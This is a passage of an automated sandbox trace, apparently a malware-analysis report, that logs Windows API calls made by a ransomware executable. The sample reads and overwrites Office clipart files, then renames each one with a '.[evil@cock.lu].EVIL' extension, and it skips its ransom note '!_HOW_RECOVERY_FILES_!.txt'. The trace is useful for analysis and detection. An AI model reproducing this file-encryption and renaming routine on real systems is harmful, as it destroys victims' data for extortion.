(_String1="J0309567.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.984] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309567.JPG") returned 0x0 [0154.984] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG") returned 0x45 [0154.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309567.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.986] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x544c, lpOverlapped=0x0) returned 1 [0154.999] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.999] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.999] _errno () returned 0x84b1160840 [0154.999] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.999] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x5460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5460, lpOverlapped=0x0) returned 1 [0154.999] CloseHandle (hObject=0x1a8) returned 1 [0154.999] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.999] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.000] __uncaught_exception () returned 0x84b1160800 [0155.000] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.000] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309567.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309567.jpg.[evil@cock.lu].evil")) returned 1 [0155.001] ??_V@YAXPEAX@Z () returned 0x1 [0155.004] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG", dwFileAttributes=0x200) returned 0 [0155.004] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.004] wcsstr (_Str="J0309585.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.004] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG") returned 69 [0155.005] wcscmp (_String1="J0309585.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.005] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309585.JPG") returned 0x0 [0155.005] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG") returned 0x45 [0155.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.007] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9a8b, lpOverlapped=0x0) returned 1 [0155.016] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.016] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.016] _errno () returned 0x84b1160840 [0155.016] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.016] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x9aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9aa0, lpOverlapped=0x0) returned 1 [0155.016] CloseHandle (hObject=0x1a8) returned 1 [0155.017] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.017] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.017] __uncaught_exception () returned 0x84b1160800 [0155.017] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.017] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg.[evil@cock.lu].evil")) returned 1 [0155.018] ??_V@YAXPEAX@Z () returned 0x1 [0155.022] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG", dwFileAttributes=0x200) returned 0 [0155.022] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.022] wcsstr (_Str="J0309598.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.022] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG") returned 69 [0155.022] wcscmp (_String1="J0309598.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.022] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309598.JPG") returned 0x0 [0155.022] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG") returned 0x45 [0155.022] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.024] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x81f0, lpOverlapped=0x0) returned 1 [0155.032] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.032] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.032] _errno () returned 0x84b1160840 [0155.032] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.032] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8200, lpOverlapped=0x0) returned 1 [0155.033] CloseHandle (hObject=0x1a8) returned 1 [0155.033] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.033] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.033] __uncaught_exception () returned 0x84b1160800 [0155.033] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.033] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg.[evil@cock.lu].evil")) returned 1 [0155.034] ??_V@YAXPEAX@Z () returned 0x1 [0155.037] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG", dwFileAttributes=0x200) returned 0 [0155.037] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.037] wcsstr (_Str="J0309664.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.037] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG") returned 69 [0155.037] wcscmp (_String1="J0309664.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309664.JPG") returned 0x0 [0155.037] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG") returned 0x45 [0155.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.039] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaabb, lpOverlapped=0x0) returned 1 [0155.046] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.046] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.046] _errno () returned 0x84b1160840 [0155.046] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.046] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xaac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaac0, lpOverlapped=0x0) returned 1 [0155.047] CloseHandle (hObject=0x1a8) returned 1 [0155.047] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.047] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.047] __uncaught_exception () returned 0x84b1160800 [0155.047] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.047] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg.[evil@cock.lu].evil")) returned 1 [0155.048] ??_V@YAXPEAX@Z () returned 0x1 [0155.051] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG", dwFileAttributes=0x200) returned 0 [0155.051] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.051] wcsstr (_Str="J0309705.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.051] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG") returned 69 [0155.051] wcscmp (_String1="J0309705.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.051] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309705.JPG") returned 0x0 [0155.051] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG") returned 0x45 [0155.051] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.053] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ada, lpOverlapped=0x0) returned 1 [0155.060] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.060] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.060] _errno () returned 0x84b1160840 [0155.060] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.061] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ae0, lpOverlapped=0x0) returned 1 [0155.061] CloseHandle (hObject=0x1a8) returned 1 [0155.061] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.061] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.061] __uncaught_exception () returned 0x84b1160800 [0155.061] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.061] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg.[evil@cock.lu].evil")) returned 1 [0155.062] ??_V@YAXPEAX@Z () returned 0x1 [0155.065] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG", dwFileAttributes=0x200) returned 0 [0155.065] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.065] wcsstr (_Str="J0309902.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.065] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF") returned 69 [0155.065] wcscmp (_String1="J0309902.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.065] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309902.WMF") returned 0x0 [0155.065] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF") returned 0x45 [0155.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.067] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a00, lpOverlapped=0x0) returned 1 [0155.075] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.075] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.075] _errno () returned 0x84b1160840 [0155.075] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.075] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a20, lpOverlapped=0x0) returned 1 [0155.075] CloseHandle (hObject=0x1a8) returned 1 [0155.075] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.076] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.076] __uncaught_exception () returned 0x84b1160800 [0155.076] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.076] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf.[evil@cock.lu].evil")) returned 1 [0155.077] ??_V@YAXPEAX@Z () returned 0x1 [0155.079] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF", dwFileAttributes=0x200) returned 0 [0155.080] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.080] wcsstr (_Str="J0309904.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.080] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF") returned 69 [0155.080] wcscmp (_String1="J0309904.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.080] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309904.WMF") returned 0x0 [0155.080] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF") returned 0x45 [0155.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.082] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x20e4, lpOverlapped=0x0) returned 1 [0155.094] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.094] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.094] _errno () returned 0x84b1160840 [0155.094] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.094] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2100, lpOverlapped=0x0) returned 1 [0155.094] CloseHandle (hObject=0x1a8) returned 1 [0155.095] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.095] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.095] __uncaught_exception () returned 0x84b1160800 [0155.095] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.095] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf.[evil@cock.lu].evil")) returned 1 [0155.096] ??_V@YAXPEAX@Z () returned 0x1 [0155.100] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF", dwFileAttributes=0x200) returned 0 [0155.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.100] wcsstr (_Str="J0309920.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.100] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF") returned 69 [0155.100] wcscmp (_String1="J0309920.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.100] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309920.WMF") returned 0x0 [0155.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF") returned 0x45 [0155.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.103] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b38, lpOverlapped=0x0) returned 1 [0155.128] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.128] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.128] _errno () returned 0x84b1160840 [0155.128] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.128] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b40, lpOverlapped=0x0) returned 1 [0155.128] CloseHandle (hObject=0x1a8) returned 1 [0155.128] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.129] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.129] __uncaught_exception () returned 0x84b1160800 [0155.129] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.129] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf.[evil@cock.lu].evil")) returned 1 [0155.130] ??_V@YAXPEAX@Z () returned 0x1 [0155.134] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF", dwFileAttributes=0x200) returned 0 [0155.134] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.134] wcsstr (_Str="J0313896.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.134] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG") returned 69 [0155.134] wcscmp (_String1="J0313896.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.134] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0313896.JPG") returned 0x0 [0155.134] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG") returned 0x45 [0155.134] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg"), 